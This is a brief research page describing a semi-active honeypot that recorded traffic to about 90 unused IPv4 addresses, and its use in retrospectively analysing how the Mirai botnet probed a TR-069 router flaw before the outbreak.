Semi-Active Honeypot

Semi-active honeypots allow to record unusual Internet traffic without implementing a specific application protocol.

I’ve captured Internet traffic from about 90 unused IPv4 addresses for several years. The IP addresses had been in active use before, which led to effects like BitTorrent swarms attempting to connect to it.

A generic TCP honeypot server ( was used for accepting incoming connections and reading TCP payload. Other than that, the subnet was listening passively while tcpdump was capturing traffic. My students Patrick Schumacher (2013) and Jan-Frederik Zaeske (2017) analyzed the .pcap data.

A use case for this type of measurement is the analysis of botnet activity like the Mirai botnet, which appeared in November 2016. Mirai exploited a remote code execution security flaw in the implementation of the TR-069 remote management in broadband routers. With the captured TCP payload, we can retrospectively analyze the commands injected by Mirai. By plotting a timeline of activity (animation), we notice that the security flaw was surveyed from US hosts about one week before Mirai became alive. If one detected this early activity, they would have had a head start and might take defensive measures before the botnet hit them.